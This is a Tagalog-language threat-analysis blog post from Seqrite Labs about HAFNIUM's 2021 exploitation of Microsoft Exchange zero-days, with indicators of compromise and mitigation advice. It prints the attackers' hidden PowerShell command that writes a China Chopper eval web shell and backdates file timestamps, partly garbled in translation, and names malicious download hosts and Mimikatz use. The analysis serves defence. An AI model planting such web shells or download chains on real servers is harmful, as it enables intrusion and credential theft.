• Mga Produkto at Serbisyo
        • Ulap

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Sa Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • Maliit na negosyo

          • SOHO Total Edition
        • Serbisyo

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Cybersecurity at Data Privacy Kamalayan
  • Solutions
    • BFSI
    • Edukasyon
    • Pamahalaan
    • Healthcare
    • ITeS
    • manufacturing
  • kompanya
    • Tungkol samin Seqrite
    • Pamumuno
    • Mga parangal at Sertipikasyon
    • silid-basahan
  • Kasosyo
    • Partner Program
    • Hanapin ang Kasosyo
    • Maging isang Kasosyo
  • Suporta
  • Mga mapagkukunan
    • blog
    • Puting papel
    • Mga Datasheet
    • Pag-aaral ng Kaso
    • Mga Ulat sa Banta
    • Manual
    • PoV
    • Unawa sa Data Privacy
    • Suriin ang Iyong Iskor sa Panganib
    • Mga Diyalogo ng DPDP
    • Oras ng Pagkapribado
Seqrite Labs Blog
Makipag-ugnay sa Sales Inaatake?
  • Mga Produkto at Serbisyo
        • Ulap

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Sa Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • Maliit na negosyo

          • SOHO Total Edition
        • Serbisyo

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Cybersecurity at Data Privacy Kamalayan
  • Solutions
    • BFSI
    • Edukasyon
    • Pamahalaan
    • Healthcare
    • ITeS
    • manufacturing
  • kompanya
    • Tungkol samin Seqrite
    • Pamumuno
    • Mga parangal at Sertipikasyon
    • silid-basahan
  • Kasosyo
    • Partner Program
    • Hanapin ang Kasosyo
    • Maging isang Kasosyo
  • Suporta
  • Mga mapagkukunan
    • blog
    • Puting papel
    • Mga Datasheet
    • Pag-aaral ng Kaso
    • Mga Ulat sa Banta
    • Manual
    • PoV
    • Unawa sa Data Privacy
    • Suriin ang Iyong Iskor sa Panganib
    • Mga Diyalogo ng DPDP
    • Oras ng Pagkapribado
Home   /  Security sa Enterprise  / Lahat ng kailangan mong malaman tungkol sa Microsoft Exchange Server Zero-Day Vulnerabilities
Lahat ng kailangan mong malaman tungkol sa Microsoft Exchange Server Zero-Day Vulnerabilities
18 Mayo 2021

Lahat ng kailangan mong malaman tungkol sa Microsoft Exchange Server Zero-Day Vulnerabilities

Sinulat ni Prashant Tilekar
Prashant Tilekar
Security sa Enterprise

Noong Marso 2, inanunsyo ng Microsoft na isang threat group, ang HAFNIUM, ang aktibong nagsasamantala sa apat na zero-day vulnerabilities sa kanilang mga Exchange Server. Naglabas ang Microsoft ng mga out-of-band security update (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, at CVE-2021-27065), na nagbibigay-daan sa mga attacker na makapasok sa mga email account at magpatakbo ng malware sa server nang hindi man lang nalalaman ang anumang wastong kredensyal ng account.

Sinasamantala ng mga banta ng aktor ang kahinaan ng Zero-Day Server-Side Request Forgery (SSRF) sa Microsoft Exchange CVE-2021-26855. Nagbibigay-daan ito sa umaatake na i-bypass ang pagpapatotoo at makakuha ng remote code execution.

Ang CVE-2021-27065 ay isang post-auth arbitrary file writing vulnerability. Lumilikha ito ng file na may suffix ng .aspx at naglalagay ng code, at sinasamantala ng mga umaatake ang kahinaang ito. Inaasahan namin na ang mga umaatake ay nag-a-upload ng "china chopper web shell" sa mga nakompromisong server sa karamihan ng mga kaso.

Kadena ng pag-atake

Ang pagsasamantala sa mga exchange server na ito ay may kasamang mga indicator na nakompromiso sa IOC, web shell, o aspx na mga file. Kapag nangyari na ang pagsasamantala, ini-install ng mga attacker ang web shell sa Exchange server sa isang partikular na lokasyong "C:\inetpub\wwwroot\aspnet_client\discover.aspx" ng mga exchange server. Nakakita kami ng maraming aspx file sa pag-atakeng ito na may karaniwang pangalan tulad ng aspnet_client.aspx, load.aspx, discover.aspx, supp0rt.aspx, acceptable.aspx, error_page.aspx, shell.aspx, logaaa.aspx, dict.aspx, atbp., nakakita kami ng mga web shell sa Offline Address Book (OAB) na mga file.

Maaaring magpasok ang mga attacker ng code sa aspx page ng exchange Offline Address Book; ginagamit ang mga pahinang ito para sa karagdagang pagsasamantala. Natagpuan namin sa ibaba ang PowerShell na Nagpapatupad gamit ang mga kahina-hinalang parameter sa nakompromisong Exchange server. Ipinapakita ng pagpapatupad ng PowerShell code na ito na ang pagsulat/pagbabago ng file ay ginagawa sa pamamagitan ng pagsasamantala sa kahinaan.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -W hidden -ep bypass -enc try {$p=”C:\\inetpub\\wwwroot\\aspnet_client\\error.aspx”;

$FileStream=New-ObjectIO.FileStream@($p,[IO.FileMode]::Gumawa); $FileStream.Write([Text.Encoding]::UTF8.GetBytes('ExternalUrl:https://f/
“server”>functionPage_Load(){/*ExchangeService*/eval(Request[“unsafe”],”unsafe”);} '),0,147);if($FileStream){$FileStream.Flush();$FileStream.Dispose();$f=(ls$p);$t=”2015-09-13″;$f.CreationTime=$t;$f.LastAccessTime=$t;$f.LastAccessTime=$t;$f.LastAccessTime=$t;$f.LastAccessOras=$t;$f.LastAccessOras=$t;$f.LastAccessOras=$t;$f.LastWrites=$t;$f.LastWrite=$t.
“system”,”hidden”,”notcontentindexed”,”archive”}}catch{}.

 

Pagsusuri ng web shell

Ang Chinese chopper web shell ay isang maliit at one-liner na script, na sinusunod sa mga pag-atakeng ito. Ang nilalaman ng mga file na ito ay uri ng kakaiba at hindi kumpleto. Ang istraktura nito ay nakakakuha ng isang uri ng HTTP GET parameter argument na tumatawag sa eval o ilang salita tulad ng hindi ligtas, na nakompromiso ng iba't ibang uri.

Halimbawa-

“https://f/ function Page_Load(){eval(Request [“XOrSeMr3kgWUdFf6″],”unsafe”);} ”

Syntax ng ExternalUrl field sa OAB file tulad ng pagkuha ng variable mula sa HTTP request at pag-execute ng command line nito sa pamamagitan ng server. Ang “https://f/” ay hindi wastong syntax, at nakikita ang ilang random na parameter ng character; iyon ay Key na paggamit para sa pagpapatunay bago isagawa ang mga code. Sa kasong ito sa itaas, kritikal ang "XOrSeMr3kgWUdFf6". Sa OAB file, makikita natin ang petsa ng pagbabago ng file sa field na WhenChanged.

Screenshot para sa aspx file-

Fig 1. ASPX file

 

Ang pagkakaiba-iba sa script na nakita natin sa web shell file, ang ilan sa mga static na makikita natin tulad ng orange, ananas, at ilan sa mga encoding mula saBase64 string na ginamit sa file. Ang ilang komplikasyon ay ginagamit upang maiwasan ang pagtuklas na hatiin ang mga string at i-encode gamit ang mga base64 na string.

Fig 2. Listahan ng ExternalUrl

Fig 3. Listahan ng mga landas

 

Aktibidad pagkatapos ng Exploitation

Sa post-exploitation, nakakita kami ng maraming pagtatangka sa pag-atake na naglulunsad upang makakuha ng ganap na access sa server; kinapapalooban nito ang iba't ibang paggamit ng operator ng mga open-source na tool at pamamaraan para magtanim ng backdoor o maraming malware.

Variant 1:

Nakakita kami ng maraming PowerShell download sa mga server. Ang unang PowerShell script ay base64 encoded code na siyang nagda-download sa susunod na yugto mula sa http[:]//p.estonine[.]com/p?e. Pagkatapos, susubukan naming i-download ito sa susunod na yugto, nalaman naming na-download na ang PowerShell script.

Fig 4. Unang PowerShell script

 

Ang na-download na PowerShell script ay kailangang mag-invoke ng expression na may base64 encode, at Zlib compressed code para sa isang heavy obfuscation technique.

Fig 5. Susunod na yugto PS

Pagkatapos i-decode at i-decompress ang script na makikita sa ibaba ng code, gumagamit ang code ng iba't ibang pagsusuri at nangangalap ng impormasyon tulad ng MAC address, AV, bersyon ng OS, domain name, at user. Gagawa ang kamay ng mutex na "Global\PSEXEC," pagkatapos ay titingnan ang mga pribilehiyo ng Administrator para sa pagpapatakbo ng proseso. Ang ccc.log ay idinisenyo para sa pagkonekta sa CNC server.

Fig 6. PowerShell code stage 2

 

Susubukan ng script na makipag-ugnayan sa “http[:]//CDN.chatcdn[.]net”, ang domain na ito ay natagpuang malisyoso sa loob ng mahabang panahon; sa nakaraang DLTMiner na kumakalat, ginamit ito sa mga script ng PowerShell. Kung tumatakbo nang may mga pribilehiyo ng admin, i-download ang ”p?hig”, kung hindi ay “p?low”. Pagkatapos ay lilikha ito ng Winnet scheduled task run-time intervals. Kung walang tugon ang server, ida-download nito ang update.png? File Mula sa IP "188.166.162.201".

Fig 7. PowerShell code stage 2

Muli, ang na-download na file ay PowerShell Script at may napakaraming obfuscated na data; pagkatapos ng pag-decode ng code, makakakuha ito ng file sa paligid ng 2 MB size script at malawak na linya ng code. Sa paggamit ng code ng open-source code na ginamit sa pagsasamantala sa pamamagitan ng SMB, naobserbahan ang smb session setup request, smb session logoff, invoke-SMBExec, at ilang lateral movement technique.

Fig 8. PowerShell stage 3

Ang karagdagang pagsisiyasat sa code, pagkatapos ng pag-decode ng base64 code, ang karagdagang pagsisiyasat sa code ay nakakita ng dalawang executable na file, na katulad ng Mimikatz payload. Ito ay credential dumping open-source program na ginagamit upang makakuha ng impormasyon sa pag-login sa account at password. Ang mga kredensyal ay maaaring gamitin upang magsagawa ng lateral na paggalaw at ma-access ang mahalaga/pinaghihigpitang impormasyon.

Variant 2:

Ang isa pang PowerShell script na aming naobserbahan ay susubukan na mag-download ng pag-download ng file mula sa pahina ng GitHub. Ang extension para sa file ay .png, ngunit ito ay PE executable na file.

Fig 9. variant ng PowerShell Script 2

Kami ay nag-iimbestiga nang higit pa sa naturang PowerShell script, at ang chain ng impeksyon ay magbabahagi ng ilang kapana-panabik na bagay na kinuha ang paggamit ng mga kahinaan ng server ng Microsoft Exchange.

 

Mga IOC

Webshell Hashes PE Hashes
0CD6F96A3460BE65C70C88A764F6EC56 3547D371C975779D6E0EDDF145936FB1
137E3A611C961EF33AAF49CCAA35E710 8AEA2AE91CC084731A08AA231E79A430
1A06924B507FA9A48E94D8AB819C7E42 9ff2613df0fc30afbc552f40360c37e7
1B18EC3D2B27CE39E83D602CB8BA84FE cad2ee0a2e085a319505c4c4b68b3d2b
1EAC1B6CE217C4BD31E93A3D913AF010 E438712E336982548B884CBFBFEE6C9E
217747243CB1FB9EAF6999284D7B9FCB
3068ECC45C32C24C8FD56FC0CB0A8829
3446CEEE4BEA404ED72E14E154763428
35B332744E614EF07A94FF4AC03B1F1A
35FCA708A86BEE43F068AD53C289963D
3CDBE5DF6383A6604737076F9E97E25A
49A62802887B6CA23FD067B942631698
4D0C46CA88840A2649CD0C8596EA0AF9
50499D3A3F4A072FD2FA3C5C5E651E25
5970381424FB282AD7683431EB38C4B5
5DD588C96A81586EE653BDB80D301A87
65159FE1E1AE21F68CD235A8C045787A
6654AA50456B7D7C10061957DA128EF6
6B2AEC787E30369911265CFA932192F4
6D5F087C1D2E5A98E8EF00FE7883A531
6F5909B3060D0F9AD4C4F4F6EFBAAC27
87DCB5D6CCD2D614C34197915A9ADE15
8B99A15118D4FB563CDEFA97BFEC6BFE
8CBF320BC0E0BE871E04152AFF775238
8D5315AA11C3DBCDDFBA1A8D8D695F6B
93448E9EC4EEDA337879B148475B0E77
94881B3621AF9A4DC64678258364A82B
B82E014EE386C569710A9B03A7294A4C
B86798F8F643CA76F20916C9347AE1C8
BA7235A228BEB5B8D1C630DA46B17E5F
BEE691F207A19D782CCFBE5887B91015
C11680638FFF66F5DD494151D4A77389
CB9BE56C0DA7D625277823C796A10B12
D02AD7D92D348E011F4C63CBA6BA639D
D08194CBB0D72C2609719C8E87D9036D
D2EE996FBFB6ACA47CFD4319543626A3
D70FBE37FA09856158361411624591E7
D8A14C2BC15DC04B0BAE8A992990D41F
DEADBB5A1E9669E268D2C1CC5D9965B0
E6F23A3282C7F0A693433815B4CFFC8F
EDB48532A2AA88558474FFEA64355129
EF374AAB0EFFF9914A83362E0896F651
EFD4DC84D422420E887E6400FECCDDAD
F7D74667839288B659EC1D87217FC749
FBB4182C9A441688FD71996DE7445A6F

Mga Domain/IP

  • http[:]//p.estonine[.]com/p?e
  • http[:]//cdn.chatcdn[.]net
  • http[:]//40.115.162.72/89[.]png
  • https[:]//raw.githubusercontent[.]com/eluken890enlk/exmails/main
  • 188.166.162.201
  • 178.21.164.68

 

Pangalan ng Quickheal Detection

  • HTTP/CVE-2021-26855.MES!PT
  • HTTP/MSExchangeServer.SSRF!PT
  • CVE-2021-26855.Webshell

Buod

Ang mga banta ng aktor na nagsasamantala sa mga zero-day na kahinaan na ito laban sa mga mahihinang server ng Microsoft Exchange, maraming mga post exploiting technique na ginagamit ng mga banta ng aktor upang makakuha ng access/makontrol ang Exchange server, kaya mahalagang mag-patch ng mga pinakabagong update sa seguridad.

Kami, bilang Quick heal, ay nagdagdag ng detection para sa vulnerability na ito sa IPS at file-based na detection para matukoy ang mga nakompromisong server at ang presensya ng iba pang IOC tulad ng mga web shell.

 

Pagpapagaan

  • Lubos naming ipinapayo na agad na i-update ang lahat ng mga server ng Microsoft Exchange sa pinakabagong magagamit na mga patched na bersyon na inilabas ng Microsoft.
  • Upang maprotektahan ang mga naturang pag-atake/pagsasamantala, inirerekomenda na magkaroon ng produkto ng seguridad sa kapaligiran at na-update sa oras.
  • Ang pangangailangang maglapat ng mga patch ng seguridad sa oras mula sa mga vendor ay makakatulong upang maprotektahan at ma-secure ang mga system.
  • Kung nakompromiso na ang server, kailangan nating linisin ang server bago mag-patch.
  • Sa ibaba ng mga tool sa pagpapagaan na ibinahagi ng Microsoft ay maaaring gamitin ito laban sa kahinaan-
  • https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/
  • https://github.com/microsoft/CSS-Exchange/tree/main/Security

 nakaraang PostBakit mahalaga ang pagtiyak sa mga empleyado na may cyber hygiene para sa lahat o...
susunod na Post  Seqrite Sinusuportahan ng Endpoint Security ang Windows 10 Mayo 2021 Update 21H...
Prashant Tilekar

Tungkol kay Prashant Tilekar

Si Prashant Tilekar ay bahagi ng HIPS (Host-based Intrusion Prevention System) team sa Quick Heal Security Labs. Nagtrabaho siya sa iba't ibang mga kahinaan sa seguridad...

Mga Artikulo ni Prashant Tilekar »

Kaugnay na Post

  • Nangungunang 6 na banta sa cybersecurity na dapat maging handa ang bawat Startup o Negosyo na labanan sa kasalukuyang panahon

    Disyembre 3, 2021
  • Bakit mahalaga ang pagtiyak sa mga empleyado na may cyber hygiene para sa lahat ng organisasyon?

    Mayo 12, 2021
  • Ang mga kumpanya ng teknolohiya ay nagpupumilit na magtatag ng mahusay na mga remote na operasyon

    Kailan mauunawaan ng mga negosyo ng IT at ITes ang mga panganib sa paglabag sa data mula sa isang work from home staff?

    Hunyo 9, 2020
Mga Tampok na May-akda
  • Seqrite
    Seqrite

    Seqrite ay isang nangungunang tagapagbigay ng mga solusyon sa cybersecurity para sa mga negosyo. Nakatuon...

    Magbasa pa ng mga artikulo ni Seqrite
  • Jyoti Karlekar
    Jyoti Karlekar

    Ako ay isang masugid na manunulat na nasisiyahan sa paggawa ng nilalaman tungkol sa mga umuusbong na teknolohiya at...

    Magbasa pa ng mga artikulo ni Jyoti Karlekar
  • Bineesh P
    Bineesh P

    Ako ay isang masigasig na mahilig sa cybersecurity at isang dedikadong manunulat. May talino...

    Magbasa pa ng mga artikulo ni Bineesh P
  • Sanjay Katkar
    Sanjay Katkar

    Si Sanjay Katkar ay ang Pinagsamang Managing Director ng Quick Heal Technologies...

    Magbasa pa ng mga artikulo ni Sanjay Katkar
Paksa
malamang (25) Pag-atake sa cyber (36) cyber-atake (58) cyberattack (16) cyberattacks (15) Cybersecurity (341) cyber seguridad (34) Banta ng cyber (33) pagbabanta cyber (51) data paglabag (56) mga paglabag sa data (29) pagkawala ng data (28) pag-iwas sa pagkawala ng data (34) data privacy (16) proteksyon ng data (34) data security (19) DLP (50) DPDP (14) DPDPA (17) Encryption (16) endpoint security (113) Seguridad sa enterprise (20) Pagsamantalahan (13) GDPR (14) malware (76) pagsusuri ng malware (14) pag-atake ng malware (23) MDM (27) microsoft (15) MITER ATT&CK (14) Seguridad sa network (26) Phishing (30) ransomware (69) atake ng ransomware (31) atake ng ransomware (31) proteksyon sa ransomware (17) Seqrite (41) Seqrite Encryption (27) Seqrite EPS (33) Seqrite Serbisyo (16) pagbabanta ng pagbabanta (14) Threat Intelligence (21) UTM (34) Kahinaan (16) zero tiwala (13)
Seqrite Labs

Nangunguna sa enterprise IT security solutions provider na pinapasimple ang endpoint, data, at network security na may pinakamahusay na in-class na mga solusyon sa pag-iwas, pagtuklas, at pagtugon sa pagbabanta sa buong mundo.

Magbasa pa tungkol sa Seqrite

Sundan kami:

Mag-subscribe Upang Ang aming Newsletter

Manatiling may alam tungkol sa pinakabagong mga uso at insight sa cybersecurity.

Pagkarga
Mga Produkto at Serbisyo
  • Ulap
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • Sa Prem
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Platform
  • Malware Analysis Platform
  • Micro Business
  • SOHO Total Edition
  • Serbisyo
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Cybersecurity at Data Privacy Kamalayan
Mga mapagkukunan
  • blog
  • Puting papel
  • Mga Datasheet
  • Mga Ulat sa Banta
  • Manual
  • PoV
  • Unawa sa Data Privacy
  • Mga Diyalogo ng DPDP
  • Patakaran at Pagsunod
  • EULA
  • GoDeep.AI
  • SIA
  • Oras ng Pagkapribado
Makipag-ugnayan sa amin
  • Mga Rehistradong Tanggapan
  • Pag-usapan natin ang Cybersecurity
Suporta
  • Teknikal na Suporta
  • I-download ang Software
  • Offline Updater
  • Mga Pag-upgrade sa Firmware
  • Upgrade
  • Documentation ng Produkto
Sa
  • Tungkol samin Seqrite
  • Pamumuno
  • Mga Gantimpala at Pagkilala
  • silid-basahan
Kasosyo
  • Partner Program
  • Hanapin ang Kasosyo
  • Maging isang Kasosyo
  • Seqrite certification

© 2026 Quick Heal Technologies Ltd.

Sitemap Mga Patakaran sa Privacy legal Notices Mga Patakaran sa Cookie Mga Tuntunin ng Paggamit